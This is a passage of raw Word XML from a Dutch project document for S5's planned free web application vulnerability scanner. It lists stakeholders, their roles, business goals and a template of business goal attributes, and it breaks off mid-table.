          <w:p w14:paraId="34680FEA" w14:textId="7D319CD4" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="17374799" w14:textId="6C7A5951" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Bijdragers (ontwikkelaars)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC265EA" w14:textId="52487C83" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Secondaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="3A074014" w14:textId="77777777" w:rsidTr="00C05408">
        <w:trPr>
          <w:trHeight w:val="989"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59971569" w14:textId="43320FBD" w:rsidR="00ED14AA" w:rsidRPr="00F5608B" w:rsidRDefault="00ED14AA" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="141D3770" w14:textId="2CC177BB" w:rsidR="00ED14AA" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Programmeer Libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE47271" w14:textId="41DD9FB5" w:rsidR="00ED14AA" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Secondaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54DFCDBA" w14:textId="1C4A1F7E" w:rsidR="006813C6" w:rsidRDefault="00272E09" w:rsidP="005B1B18">
      <w:r>
        <w:t>Tabel 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A6D5A" w14:textId="77777777" w:rsidR="005B0DB7" w:rsidRDefault="005B0DB7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Primaire stakeholders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989D50D" w14:textId="77777777" w:rsidR="00F322D2" w:rsidRDefault="00F32E36">
      <w:r>
        <w:t>De primaire stake</w:t>
      </w:r>
      <w:r w:rsidR="00470A7E">
        <w:t>holders zijn de meest van belang voor het project, deze stakeholders hebben direct invloed op de ontwikkeling van het project.</w:t>
      </w:r>
      <w:r w:rsidR="00471FAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F322D2">
        <w:t>Ieder stakeholder heeft zijn rol binnen het project en het is de bedoeling om met alle primaire stakeholders het project tot een succes te maken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EFE18" w14:textId="77777777" w:rsidR="00F322D2" w:rsidRDefault="00F322D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F322D2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rollen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7950AEEF" w14:textId="209C5CC4" w:rsidR="00456DAE" w:rsidRPr="00456DAE" w:rsidRDefault="00FD2B9F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">S5 – De opdrachtgevers van het project en </w:t>
      </w:r>
      <w:r w:rsidR="004C7C0D">
        <w:t xml:space="preserve">product </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C7C0D">
        <w:t>owners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00456DAE">
        <w:t>. Zij zijn deels verantwoordelijk voor het goedkeuren van userpoints (</w:t>
      </w:r>
      <w:r w:rsidR="001A16DB">
        <w:t>Glossary</w:t>
      </w:r>
      <w:r w:rsidR="00456DAE">
        <w:t>, #)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16CF3B" w14:textId="77777777" w:rsidR="0094505B" w:rsidRPr="0094505B" w:rsidRDefault="00456DAE" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Ontwikkelaars – Zij zijn verantwoordelijk voor het ontwikkelen van</w:t>
      </w:r>
      <w:r w:rsidR="0094505B">
        <w:t xml:space="preserve"> het softwaresysteem (Web Applicatie Scanner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADEA67F" w14:textId="77777777" w:rsidR="00F875D2" w:rsidRPr="00F875D2" w:rsidRDefault="009546FF" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Klanten S5 – Zij zijn het die de eindgebruikers zijn van het softwaresysteem, hun belangen staan vooraan in het project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF1ACE" w14:textId="297A84DE" w:rsidR="00B27C83" w:rsidRPr="00F875D2" w:rsidRDefault="00F875D2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Administrator </w:t>
      </w:r>
      <w:r w:rsidR="00E149B4">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E149B4">
        <w:t>Zij beheren het softwaresysteem na dat het live is gegaan. Voorbeeld het beheren van scans en rapporten</w:t>
      </w:r>
      <w:r w:rsidR="00B27C83" w:rsidRPr="00F875D2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478BBC6" w14:textId="1B5A8A77" w:rsidR="00F57812" w:rsidRPr="00323E0B" w:rsidRDefault="0062121F" w:rsidP="00322D15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc491022053"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="001F01DB">
        <w:t>Business Doelen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2AA27D80" w14:textId="47C12A52" w:rsidR="0048146D" w:rsidRDefault="001F01DB" w:rsidP="0048146D">
      <w:r>
        <w:t>Wat zijn de Business Doelen</w:t>
      </w:r>
      <w:r w:rsidR="0048146D">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B565BA" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
      <w:r>
        <w:t xml:space="preserve">Wat wilt S5 bereiken met dit systeem in het kader van Business?   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C5C52" w14:textId="0A6F1FF7" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
      <w:r>
        <w:t>S5 wilt een systeem bouwen met als hoofddoel een gratis g</w:t>
      </w:r>
      <w:r w:rsidR="006907A9">
        <w:t xml:space="preserve">eautomatiseerde </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006907A9">
        <w:t>website applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scanner aan te bieden. S5 is een onderneming en wilt graag dat het blijft groeien en uitbreiden. De business goals zijn zeer algemeen en gangbaar bij veel bedrijven, welke bedrijf wilt nou niet zijn services uitbreiden en de klantenrelaties versterken en consultancy aanbieden als verdienmodel. Dat het algemeen en cliché is betekent niet dat deze business goals geen impact kunnen hebben op de groei van een bedrijf. Juist voor een onderneming als S5 zijn dit de doelen waar zij naar moeten streven. Als het bedrijf weet wat het wilt bereiken dan is de volgende vraag: Hoe gaan we deze business goals bereiken?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3EA821" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="008E0AB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Services aanbod uitbreiden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0743B894" w14:textId="5EF8B0A0" w:rsidR="00323E0B" w:rsidRDefault="0048146D" w:rsidP="00323E0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:r w:rsidR="009A0ED0">
        <w:t>servicekwaliteit verbeteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30246FE5" w14:textId="77777777" w:rsidR="00323E0B" w:rsidRDefault="00323E0B" w:rsidP="00323E0B"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9348" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1552"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr w:rsidR="0009518F" w14:paraId="7CCE9F75" w14:textId="77777777" w:rsidTr="0009518F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CC9440E" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
            <w:r>
              <w:t>Doel Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="204471CE" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
            <w:r>
              <w:t>Doel omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0009518F" w14:paraId="382B175E" w14:textId="77777777" w:rsidTr="0009518F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DC8517A" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
            <w:r>
              <w:t>Service aanbod uitbreiden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28EA8678" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
            <w:r>
              <w:t>Het systeem breid de service uit door</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48357891" w14:textId="7847AAEF" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="008E0AB7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Een gratis geautomatiseerde </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">web </w:t>
            </w:r>
            <w:r w:rsidR="00E45394">
              <w:t>applicatie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> scanner aan te bieden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465F3DC0" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="008E0AB7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Door een </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>CMS extensie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> aan te bieden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ED0B7E1" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="008E0AB7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Door een consultancy service aan te bieden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0009518F" w14:paraId="02DF7AEC" w14:textId="77777777" w:rsidTr="0009518F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56CF98F0" w14:textId="58952BF9" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
            <w:r>
              <w:t xml:space="preserve">Het </w:t>
            </w:r>
            <w:r w:rsidR="00460C94">
              <w:t>servicekwaliteit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> verbeteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2141EDFB" w14:textId="381ABAE4" w:rsidR="008D2135" w:rsidRDefault="0048146D" w:rsidP="008D2135">
            <w:r>
              <w:t xml:space="preserve">Het systeem verbeterd het </w:t>
            </w:r>
            <w:r w:rsidR="00E25010">
              <w:t>servicekwaliteit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> door</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="136FD065" w14:textId="56E4C40C" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="00895A0E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Een rapport genereren op basis van de geïdentificeerde kwetsbaarheden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="439A5D7A" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="00895A0E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Website verbeteren met de aanbevelingen van het </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>security rapport</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1400E04C" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="00895A0E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Security experts in dienst nemen om de security issues op te lossen en om consultancy te geven</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A98853" w14:textId="77777777" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D2AD7BD" w14:textId="30C241D9" w:rsidR="00DF6604" w:rsidRDefault="00272E09">
      <w:r>
        <w:t>Tabel 2.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC44B84" w14:textId="42BEA80D" w:rsidR="008B137E" w:rsidRDefault="00DF6604">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Business </w:t>
      </w:r>
      <w:r w:rsidR="001F01DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>doel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26555398" w14:textId="77777777" w:rsidR="001B112A" w:rsidRDefault="001F01DB">
      <w:r>
        <w:t>De business</w:t>
      </w:r>
      <w:r w:rsidR="003D3425">
        <w:t xml:space="preserve"> doel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scenario</w:t>
      </w:r>
      <w:r w:rsidR="002E5F54">
        <w:t xml:space="preserve"> beschrijft elke doel meer in detail door </w:t>
      </w:r>
      <w:r w:rsidR="00D51591">
        <w:t xml:space="preserve">gebruik te maken van de zes attributen waar een business doel uit bestaat. </w:t>
      </w:r>
      <w:r w:rsidR="001B112A">
        <w:t>Dit zorgt ervoor dat business doelen concreet en uitvoerbaar worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DB21A9" w14:textId="3D0371DB" w:rsidR="00FA7A2B" w:rsidRDefault="00FA7A2B">
      <w:r>
        <w:t>De zes attributen zijn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3143"/>
        <w:gridCol w:w="3809"/>
      </w:tblGrid>
      <w:tr w:rsidR="0022178C" w14:paraId="5944ED07" w14:textId="77777777" w:rsidTr="0022178C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2628037C" w14:textId="3DCC5D6B" w:rsidR="00287FD9" w:rsidRDefault="008F62A4" w:rsidP="008F62A4">
            <w:r>
              <w:t>Doel Subject (DS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681A6FEE" w14:textId="39421573" w:rsidR="00287FD9" w:rsidRDefault="0022178C">
            <w:r>
              <w:t>De stakeholder die eigenaar is van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="29A372E8" w14:textId="77777777" w:rsidTr="0022178C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44461124" w14:textId="6428B79F" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Doel Object (DO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0C659F" w14:textId="78159A7D" w:rsidR="00287FD9" w:rsidRDefault="0022178C">
            <w:r>
              <w:t xml:space="preserve">De entiteit </w:t>
            </w:r>
            <w:r w:rsidR="00C93968">
              <w:t>van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="76FD4B8E" w14:textId="77777777" w:rsidTr="0022178C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E7C0891" w14:textId="290E8164" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Omgeving (O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77619E28" w14:textId="6B9500D6" w:rsidR="00287FD9" w:rsidRDefault="003B62E0">
            <w:r>
              <w:t>De context van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="10E718FB" w14:textId="77777777" w:rsidTr="0022178C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E487D7F" w14:textId="42447BF4" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Doel (D)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E03552A" w14:textId="6D5E68E6" w:rsidR="00287FD9" w:rsidRDefault="001728BC">
            <w:r>
              <w:t>Het doel zelf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="07743F14" w14:textId="77777777" w:rsidTr="00345C69">
        <w:trPr>
          <w:trHeight w:val="292"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CB61E3E" w14:textId="3D898E5C" w:rsidR="00287FD9" w:rsidRDefault="008F62A4" w:rsidP="008F62A4">
            <w:r>
              <w:t>Doel Maatregel (DM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B2E7D2" w14:textId="4831085D" w:rsidR="00287FD9" w:rsidRDefault="00345C69">
            <w:r>
              <w:t xml:space="preserve">Het succes criteria van het doel </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="0F275A85" w14:textId="77777777" w:rsidTr="00372C97">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11A4A94D" w14:textId="1C630B09" w:rsidR="00287FD9" w:rsidRDefault="00F72B88">
            <w:r>
              <w:t xml:space="preserve">Achtergrond </w:t>
            </w:r>
            <w:r w:rsidR="004D6D97">
              <w:t>Informatie (Ai)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74FFA9F0" w14:textId="1570135B" w:rsidR="00287FD9" w:rsidRDefault="00372C97">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Achtergrond informatie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> over het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04FEFE2B" w14:textId="3C1D42A9" w:rsidR="000F2404" w:rsidRDefault="00272E09">
      <w:r>
        <w:t>Tabel 2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DD2E9E" w14:textId="77777777" w:rsidR="000F2404" w:rsidRDefault="000F2404">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA9D9A" w14:textId="77777777" w:rsidR="00FA7A2B" w:rsidRDefault="00FA7A2B"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9773" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1739"/>
        <w:gridCol w:w="4425"/>
        <w:gridCol w:w="3609"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE0A7C" w14:paraId="38A0E589" w14:textId="77777777" w:rsidTr="00DE0A7C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C731871" w14:textId="5806284A" w:rsidR="00CC637F" w:rsidRDefault="00CC637F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Doel Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767D74E6" w14:textId="44003BE5" w:rsidR="00CC637F" w:rsidRDefault="00CC637F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Informele business doel statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45FA9131" w14:textId="5806AA70" w:rsidR="00CC637F" w:rsidRDefault="00CC637F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Business Doel Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE0A7C" w14:paraId="7D8B7489" w14:textId="77777777" w:rsidTr="00DE0A7C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F927F5B" w14:textId="560931D8" w:rsidR="00CC637F" w:rsidRPr="00503AB1" w:rsidRDefault="00503AB1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Service aanbod uitbreiden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="022C7D96" w14:textId="39CA0A1B" w:rsidR="00CC637F" w:rsidRPr="00503AB1" w:rsidRDefault="00503AB1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
